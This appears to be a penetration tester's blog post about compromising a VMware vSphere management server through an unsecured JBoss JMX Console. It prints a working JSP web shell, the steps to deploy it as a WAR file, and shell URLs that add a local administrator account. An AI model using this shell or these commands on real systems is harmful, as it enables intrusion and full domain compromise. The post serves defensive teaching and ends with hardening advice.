Virtual Security Management – Virtualisation is amazing for running things simultaneously, on-the-go etc but security problems do come with the positives.”
First of all, in the interests of fairness, I should point out that I think virtualisation is amazing. I love the idea that my laptop can run several different, largely independent operating systems simultaneously. I love the fact that I can get an entire network and domain infrastructure onto a single physical system, which has a considerably lower power draw than the physical servers would have. And I love the fact that full system backups (snapshots) can take seconds. There are, however, a number of problems, from a security perspective, that go hand in hand with virtualisation, one of which I will discuss here.
I was part of a team of penetration testers that conducted an internal penetration test for a public sector organisation earlier this year. The organisation utilised the well-known virtualisation platform VMware vSphere to host a number of their central systems, including one of their Active Directory domain controllers.
The virtualisation host management network was segregated from the internal network using a carefully constructed series of network VLANs and subnets. In order to perform management activities, a designated dual-homed administration server was configured, with access through the “Remote Desktop” protocol permitted only for members of the local “Administrators” security group. This group consisted of the built-in “Administrator” account (which was disabled) and the Active Directory “Domain Admins” security group. This server had all of the necessary tools for administration of the vSphere environment installed and configured, and the local “Administrators” group was given administrative permissions on the vSphere cluster.
A TCP port scan of the management server identified a web interface was available on port 9090, which turned out to be an unsecured installation of the JBoss JMX Console.
It was possible to upload a specially crafted file (known as a WAR file), and gain an interactive command shell on this server. Some example code is shown below:
1) Create a simple JAVA based interactive shell:
%@ page import="java.util.*,java.io.*"%>
<HTML><BODY><FORM METHOD="GET" NAME="myform" ACTION="">
<INPUT TYPE="text" NAME="cmd">
<INPUT TYPE="submit" VALUE="Send">
</FORM>
<pre><%
if (request.getParameter("cmd") != null) {
out.println("Command: " + request.getParameter("cmd") + "<BR>");
Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));
OutputStream os = p.getOutputStream();
InputStream in = p.getInputStream();
DataInputStream dis = new DataInputStream(in);
String disr = dis.readLine();
while ( disr != null ) {
out.println(disr);
disr = dis.readLine();}}%>
</pre></BODY></HTML>2) Compile the shell file into a WAR file:
jar -cf cmd.war cmd.jsp3) Host the WAR file on a local web server.
4) Invoke the “AddUrl()” function on the JBoss DeploymentScanner MBean to transfer the WAR file to the server (“localhost” is the target):
https://localhost:9090/jmx-console/HtmlAdaptor?action=inspectMBean&name=j...
5) Browse to the uploaded command shell at https://localhost:9090/cmd/cmd.jsp
Further investigation revealed that this uploaded shell was running in the context of the local “SYSTEM” account:
https://localhost:9090/cmd/cmd.jsp?cmd=whoami
NT Authority\SYSTEMThis highly privileged account allowed the creation of a new user account in the local “Administrators” group which immediately inherited complete control over the vSphere cluster:
https://localhost:9090/cmd/cmd.jsp?cmd=net+user+dionach+*******+/add
http...It was then a fairly straightforward task to take a copy of the virtualised domain controller, and then extract the password hashes of the domain accounts and crack them offline.
The lesson to take away from this is that, while virtualisation offers many benefits to an organisation, a great deal of care has to be taken to ensure that management of the virtual environment is performed in as secure a fashion as possible, and doesn’t introduce potential vulnerabilities into the network. A key part of this being to ensure that any designated management systems are fully and appropriately hardened and secured.